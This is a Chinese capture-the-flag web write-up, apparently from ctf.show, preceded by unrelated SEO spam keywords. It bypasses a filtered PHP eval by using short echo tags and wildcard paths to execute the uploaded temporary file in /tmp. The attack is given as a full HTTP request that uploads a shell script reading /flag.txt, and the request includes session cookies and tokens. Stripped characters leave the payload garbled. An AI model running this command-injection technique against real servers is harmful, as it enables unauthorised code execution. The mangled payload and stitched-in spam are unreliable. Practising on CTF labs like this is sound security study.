酒店 网站建设 中企动力,wordpress缩略图清理,房地产公司网站下载,温岭哪里有做网站的0x00 前言
CTF 加解密合集CTF Web合集
0x01 题目 0x02 Write Up
同样#xff0c;先看一下有没有注释的内容#xff0c;可以看到有一个cmd的入参 执行之后可以看到文件代码#xff0c;可以看到也是eval#xff0c;但是中间对大部分的字符串都进行了过滤#xff0c;留下了…0x00 前言
CTF 加解密合集CTF Web合集
0x01 题目 0x02 Write Up
同样先看一下有没有注释的内容可以看到有一个cmd的入参 执行之后可以看到文件代码可以看到也是eval但是中间对大部分的字符串都进行了过滤留下了一个字母p 这里就需要知道一个知识点php中可以通过?进行打印相当于echo但是必须使用?对之前的内容进行闭合
还有一个知识点就是如果是PHP上传文件的话会在/tmp下生成一个为phpxxxxxx的文件x为随机字母
那么构造一下poc就是
??./??p/p?p??????; 表示占位符
那么最终的数据包就是
POST /?cmd?%3E%3C?./??p/p?p??????; HTTP/1.1
Host: 6aae41f0-5311-43d9-9769-75453c352b5b.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: xxxxxx
Content-Type: multipart/form-data; boundary---------------------------107149833622792667114153151063
Content-Length: 258
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/run_any
Cookie: login_localezh_CN; avatarImageUrl-351954267144434677; csrftokennbORQ4TEUH5bqVtZlC9gjZ4qzooR96rzFg7VCEOFmkouupiE1KIWdvQGCBqQnrBY; __utma96992031.1671372876.1687101569.1687101569.1687101569.1; __utmz96992031.1687101569.1.1.utmcsr(direct)|utmccn(direct)|utmcmd(none); sessionidlnu0vgi75dlekaxsf7iu5g4j2nof5oug
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin-----------------------------107149833622792667114153151063
Content-Disposition: form-data; namefile; filename1.php
Content-Type: application/octet-stream#! /bin/shcat /flag.txt
-----------------------------107149833622792667114153151063--
最终获取falg
以上
